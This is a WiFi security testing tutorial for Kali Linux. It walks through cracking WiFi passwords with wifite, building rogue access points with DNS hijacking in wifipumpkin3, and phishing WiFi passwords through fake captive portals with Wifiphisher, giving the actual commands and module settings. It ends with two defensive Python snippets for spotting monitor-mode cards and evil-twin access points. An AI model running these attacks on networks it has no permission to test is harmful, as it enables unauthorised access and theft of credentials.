Getting Started with WiFi Security Testing

Learn the steps on how to get started with WiFi security testing using Kali Linux and a NIC.


Let's dive in!

Preparation

To begin WiFi security testing, gather the following materials.

1) Obtain an external network card: Netcore NW392

2) Look up the card's chipset information; this card uses a Realtek chipset that needs the rtl88xxau driver package installed by hand.

This device currently requires manual driver installation.

3) Enter the following command in the Kali Linux command line to install the driver manually (root privileges are required):

sudo apt install realtek-rtl88xxau-dkms   # answer y when asked to continue the installation

Note: on a slow network the download may stall for a long time at around 69% and 85% progress; be patient and let it finish.

4) After the installation completes, reboot the machine with the reboot command.

Wireless network card status query

In this next section, we will cover how to view wireless network information.

1) First, enter the command iwconfig in the Kali Linux command line to view the wireless interface information.

The Mode field in the output indicates the card's working mode:
When the mode is Monitor, the card listens to the wireless traffic of nearby devices without joining a network.
When the mode is Managed (the default after booting), the card connects to wireless access points as an ordinary client.

2) To change the working mode of the NIC, enter the following command (most drivers only accept a mode change while the interface is down, so run ip link set wlan0 down first and bring it back up afterwards):
iwconfig <interface> mode <Managed|Monitor>

Examples of common modes for testing are as follows:

iwconfig wlan0 mode Managed
iwconfig wlan0 mode Monitor
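As an added example (not part of the original post), the following Python parses iwconfig output of the shape described above and reports each interface's working mode, so a host audit can spot cards left in Monitor mode. The sample output and the interface names in it are constructed.

```python
# Added example (not from the original post): parse iwconfig output and report each
# wireless interface's working mode (Managed vs Monitor). Interfaces without
# wireless extensions (lo, eth0) are skipped. The sample text below is constructed.
import re

SAMPLE_IWCONFIG = """\
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:"HomeNet"  
          Mode:Managed  Frequency:2.437 GHz  Access Point: AA:BB:CC:DD:EE:FF   
          Bit Rate=72.2 Mb/s   Tx-Power=20 dBm   
          Encryption key:off
          Power Management:off

wlan1     IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off
"""

def parse_iwconfig(text):
    """Return {iface: {"mode": str|None, "essid": str|None}} for wireless interfaces only."""
    result, current = {}, None
    for line in text.splitlines():
        if line and not line[0].isspace():           # a new interface block starts at column 0
            iface, _, rest = line.partition(" ")
            if "no wireless extensions" in rest:
                current = None                        # lo / eth0 style entries carry no mode
                continue
            current = iface
            result[current] = {"mode": None, "essid": None}
            line = rest                               # the first line may already hold Mode:/ESSID:
        if current is None:
            continue
        m = re.search(r"Mode:(\w+)", line)
        if m:
            result[current]["mode"] = m.group(1)
        e = re.search(r'ESSID:(?:"([^"]*)"|(\S+))', line)   # quoted name, or off/any
        if e:
            result[current]["essid"] = e.group(1) if e.group(1) is not None else e.group(2)
    return result

def monitor_mode_interfaces(text):
    """Interfaces currently sniffing nearby traffic rather than acting as a client."""
    return sorted(i for i, info in parse_iwconfig(text).items() if info["mode"] == "Monitor")
```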

Practical explanation


Crack a WiFi password using the wifite tool for testing

In this section, I will cover how to crack a WiFi password using the wifite tool.

1) Get the current version of wifite (wifite2) from GitHub: https://github.com/kimocoder/wifite2
2) Next, run the following commands in your command line to install wifite.

$ git clone https://github.com/kimocoder/wifite2.git
$ cd wifite2
$ pip3 install -r requirements.txt   # install dependencies; normally unnecessary on Kali, where they are already satisfied
$ sudo ./wifite.py                   # run directly from the source tree
$ sudo python3 setup.py install      # optional: install wifite system-wide


Note: the wifite version bundled with Kali is older than the one on GitHub. Root privileges are required to run the wifite command for attack operations.


3) Run wifite with the -h argument to display its help information.

4) Run wifite with the -h -v parameters to display the extended help information.

This output shows the default wordlist path, which differs between the two versions:
GitHub version --- wordlist-probable.txt in the current directory
Kali version --- /usr/share/dict/wordlist-probable.txt

  • Default attack method.

5) Run wifite with root privileges and no parameters: enter ./wifite.py in the command line.

It detects the wireless card on the running device and switches it to monitor mode (to pick up nearby WiFi traffic).

6) Scanning of nearby WiFi networks starts automatically and continues until you press Ctrl+C to stop it.

7) Press Ctrl+C to stop the scan, then enter the parameters that match the purpose of the test to start cracking the WiFi password.

8) To crack a specific network, enter the serial number it was given in the scan list.
To target all listed networks, enter "all".

  • Attack the specified device.

9) You can use the -e parameter followed by the network's ESSID to target that network directly.

  • Commonly used combination of parameters explained.

Note: the following command is run from inside the wifite folder:
sudo ./wifite.py --kill -i wlan0 -mac -pow 50 --dict /password.txt

It kills processes that conflict with the wlan0 NIC, enables MAC address randomization, and then attacks WiFi networks with a signal strength of 50 or more using the specified dictionary.

Spoofing attack: use the wifipumpkin3 tool for testing


GitHub: https://github.com/P0cL4bs/wifipumpkin3
Online installation manual: https://wifipumpkin3.github.io/docs/getting-started#installation

Here is how to install the wifipumpkin3 tool for testing.

sudo apt install libssl-dev libffi-dev build-essential
sudo apt install python3-pyqt5
git clone https://github.com/P0cL4bs/wifipumpkin3.git
cd wifipumpkin3
sudo python3 setup.py install

Note: if wifipumpkin3 prints a scapy warning, update scapy to the current version from https://github.com/secdev/scapy.

  • Create a WiFi access point

# Interface on which the access point is created
set interface wlan0
# Set the name of the access point to be created
set ssid TestWIFI
# Use the noproxy plugin
set proxy noproxy
# Ignore all logs from the pydns_server
ignore pydns_server
start

Available proxy modes:
# pumpkinproxy - proxy for intercepting TCP network traffic
# captiveflask - blocks users from reaching the internet until they open a login page
# noproxy - redirects traffic without any proxy

From a client device, search for the newly created WiFi network and connect to it.


Visit the test URL from the client and log in with a test account and password:
http://testphp.vulnweb.com/login.php

  • Convenient startup script

Save the commands from the previous test to a file with the .pulp suffix and load it with the --pulp parameter.

  • Proxy mode settings

The default proxy is pumpkinproxy (the proxy used for intercept mode).

Turn on the proxy plugin

Turn off the proxy plugin

captiveflask proxy mode: a specific page pops up as soon as a client connects to the WiFi network.

Captured submissions

  • DNS hijacking

set interface wlan0
set ssid TestWIFI
set proxy noproxy
ignore pydns_server
# Load the DNS spoofing module, set the domain to hijack and the address it is redirected to
use spoof.dns_spoof
set domains wifitest.com
set redirectTo 192.168.70.133
back
start


  • Other common commands

show       # show the available attack modules
jobs       # display the attack modules running in the background
ap         # display information about the created WiFi network
proxies    # show the available proxy modes and their functions
security   # WiFi security settings: set the password and the protection method

The access point password is changed through the security settings.

Phishing attack: use the Wifiphisher tool to test

GitHub: https://github.com/wifiphisher/wifiphisher
Note: two wireless adapters are required.

Wifiphisher automatically scans for nearby WiFi networks.

Select the target you want to test and press Enter to confirm. For this demonstration the verification spoofing scenario is chosen:
1 - Network Manager Connect

Wifiphisher generates a WiFi network that asks clients to authenticate.

It interferes with the legitimate WiFi network so that clients automatically connect to the generated one.

The attack progress is displayed.

Press ESC to exit; the captured input is then displayed in the terminal.

Congratulations, you've captured a WIFI password!
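The wifipumpkin3 and Wifiphisher sections above both work by standing up an access point that copies or replaces a legitimate SSID. As an added example (not part of the original post), the following Python shows the defender's side: it parses a Wi-Fi scan in the shape of `nmcli -t -f SSID,BSSID,CHAN,SECURITY dev wifi` terse output and flags any AP that advertises a known SSID from an unknown BSSID or with a different security mode (for example an open network copying a WPA2 SSID). The scan text, the baseline of authorised APs and all SSIDs and MACs are constructed.

```python
# Added example (not from the original post): flag rogue / evil-twin APs in a constructed Wi-Fi scan.
# Input mimics `nmcli -t -f SSID,BSSID,CHAN,SECURITY dev wifi` (':'-separated, ':' in values escaped as '\:').
import re

# Constructed sample scan; SSIDs and MACs are placeholders, not real observations.
SAMPLE_SCAN = r"""
CorpNet:AA\:BB\:CC\:00\:00\:01:6:WPA2
CorpNet:AA\:BB\:CC\:00\:00\:02:11:WPA2
CorpNet:DE\:AD\:BE\:EF\:00\:01:6:
TestWIFI:DE\:AD\:BE\:EF\:00\:02:1:
GuestNet:AA\:BB\:CC\:00\:00\:03:1:WPA2
"""

# Hypothetical baseline of legitimate APs: SSID -> authorised BSSIDs and expected security mode.
AUTHORIZED = {
    "CorpNet": {"bssids": {"AA:BB:CC:00:00:01", "AA:BB:CC:00:00:02"}, "security": "WPA2"},
    "GuestNet": {"bssids": {"AA:BB:CC:00:00:03"}, "security": "WPA2"},
}

def split_terse(line):
    # Split on unescaped ':' only, then unescape '\:' inside fields (nmcli terse-mode rule).
    return [f.replace("\\:", ":") for f in re.split(r"(?<!\\):", line)]

def parse_scan(text):
    # Returns one {ssid, bssid, chan, security} dict per AP; an empty security field means open.
    aps = []
    for line in text.splitlines():
        fields = split_terse(line.strip())
        if len(fields) < 4 or not fields[0]:
            continue                                   # blank line or malformed record
        ssid, bssid, chan, security = fields[:4]
        aps.append({"ssid": ssid, "bssid": bssid.upper(), "chan": int(chan), "security": security})
    return aps

def find_evil_twins(aps, authorized=AUTHORIZED):
    # Flag APs advertising a baseline SSID from an unknown BSSID or with the wrong security mode.
    findings = []
    for ap in aps:
        base = authorized.get(ap["ssid"])
        if base is None:  # no baseline for this SSID (e.g. TestWIFI): nothing to compare against
            continue
        if ap["bssid"] not in base["bssids"]:
            findings.append((ap["ssid"], ap["bssid"], "unknown BSSID advertising a known SSID"))
        if ap["security"] != base["security"]:
            findings.append((ap["ssid"], ap["bssid"],
                             f"security {ap['security'] or 'open'}, expected {base['security']}"))
    return findings
```

Running find_evil_twins(parse_scan(SAMPLE_SCAN)) reports only the third CorpNet entry, twice: once for its unknown BSSID and once for being open instead of WPA2.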